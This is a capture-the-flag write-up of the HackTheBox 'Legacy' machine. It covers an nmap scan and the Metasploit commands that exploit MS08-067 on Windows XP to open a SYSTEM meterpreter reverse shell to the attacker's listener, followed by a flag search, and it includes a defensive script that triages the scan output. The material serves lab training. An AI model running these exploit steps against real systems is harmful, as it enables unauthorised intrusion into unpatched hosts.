Legacy HTB

HTB - Legacy Write-Up

Easy Windows Windows Security HackTheBox
ctf boot2root smb windows metasploit MS08-067
01 /

Introduction

Legacy is a retired machine on HackTheBox. The objective is to compromise the target and retrieve both the user and root flags.

Name Legacy
Difficulty Easy
OS Windows
Type Windows Security

Let's dive into the challenge!

02 /

Reconnaissance

I started by adding the machine IP to /etc/hosts:

hosts setup
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ sudo vim /etc/hosts

Then I ran a full NMAP scan to enumerate open ports and services:

nmap scan results
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ sudo nmap -sV -sC -p- -Pn legacy.htb
Starting Nmap 7.94SVN at 2024-06-15 20:21 CEST
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2024-06-20T23:19:41+03:00

Nmap done: 1 IP address (1 host up) scanned in 38.88 seconds

Only the Windows RPC/NetBIOS/SMB ports are open (135, 139, 445) and the OS is Windows XP - an end-of-life system with well-known critical vulnerabilities.

A quick search for Windows XP SMB exploits leads to the infamous MS08-067 vulnerability. I found the relevant Metasploit module here: rapid7.com - ms08_067_netapi

MS08-067 - Windows XP SMB Remote Code Execution (NetAPI)
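To show how a defender would turn this kind of scan into an exposure finding instead of an exploit, here is an added example (not part of the original write-up) that parses the service table and the smb-* host-script block from nmap's normal output and flags the risk indicators visible above: an end-of-life OS, SMB reachable on an XP host (the MS08-067 exposure), message signing disabled, and a guest session being accepted. The sample input is the scan output quoted in this post, embedded as a string; the end-of-life OS list and the severity labels are my own assumptions, not anything nmap reports.

```python
import re

# Constructed sample: the port table and host-script block from the scan above.
SAMPLE_NMAP = """\
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2024-06-20T23:19:41+03:00
"""

# "445/tcp open  microsoft-ds Windows XP microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# "|   message_signing: disabled (...)" -> key/value lines inside a script block
SCRIPT_KV_RE = re.compile(r"^\|_?\s+([\w ]+):\s*(.*)$")

# Assumption: Windows releases that no longer receive security updates.
# A real deployment would source this from the organisation's asset policy.
EOL_OS_MARKERS = ("windows xp", "windows 2000", "windows server 2003")


def parse_nmap(text):
    """Return the open-port table and the smb-* script key/values from nmap normal output."""
    ports, smb = [], {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(),
            })
            continue
        m = SCRIPT_KV_RE.match(line)
        if m:
            # Section headers such as "| smb-os-discovery:" contain '-' and do not match.
            smb[m.group(1).strip().lower()] = m.group(2).strip().lower()
    return {"ports": ports, "smb": smb}


def triage(parsed):
    """Map the parsed scan to (severity, description) findings; severity labels are assumed."""
    findings = []
    smb = parsed["smb"]
    os_name = smb.get("os", "")
    open_ports = {p["port"] for p in parsed["ports"] if p["state"] == "open"}

    if any(marker in os_name for marker in EOL_OS_MARKERS):
        findings.append(("CRITICAL", f"end-of-life OS reported over SMB: {os_name}"))
    if 445 in open_ports and "windows xp" in os_name:
        findings.append(("CRITICAL",
                         "SMB (445/tcp) exposed on Windows XP: unpatched hosts are "
                         "vulnerable to MS08-067 (Server service / NetAPI); isolate or decommission"))
    if smb.get("message_signing", "").startswith("disabled"):
        findings.append(("HIGH", "SMB message signing disabled: SMB traffic can be tampered with"))
    if smb.get("account_used") == "guest":
        findings.append(("MEDIUM", "SMB accepted an unauthenticated guest session"))
    return findings


def triage_scan(text):
    """Convenience wrapper: raw nmap output in, findings out."""
    return triage(parse_nmap(text))


if __name__ == "__main__":
    for severity, description in triage_scan(SAMPLE_NMAP):
        print(f"[{severity}] {description}")
```

Run against the scan above, every one of the four indicators fires; on a patched, supported host with signing required and guest disabled, the function returns an empty list, which is the baseline an asset inventory should be checked against.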
03 /

Getting a Shell

I loaded the exploit in Metasploit, configured the target and listener, then fired it:

metasploit - MS08-067
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ msfconsole

       =[ metasploit v6.3.44-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]

[msf] use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

set RHOSTS legacy.htb
RHOSTS => legacy.htb

set LHOST tun0
LHOST => 10.10.14.5

exploit
[-] Handler failed to bind to 10.10.14.5:4444 - address already in use.
# Port 4444 was already in use, running exploit again after freeing it:

exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1035)

(Meterpreter 1)(C:\WINDOWS\system32) >

Meterpreter session opened! The Server service that MS08-067 exploits runs as NT AUTHORITY\SYSTEM, so the shell is already SYSTEM and no privilege escalation is needed - we have full control of the machine from the start.

Both user and root flags are located under C:\Documents and Settings\:

flags
(Meterpreter 1)(C:\WINDOWS\system32) > cd "C:\Documents and Settings"
(Meterpreter 1)(C:\Documents and Settings) > search -f user.txt
Found: C:\Documents and Settings\john\Desktop\user.txt
(Meterpreter 1)(C:\Documents and Settings) > search -f root.txt
Found: C:\Documents and Settings\Administrator\Desktop\root.txt

Both flags captured! Box fully pwned via MS08-067 NetAPI SMB exploit. 💀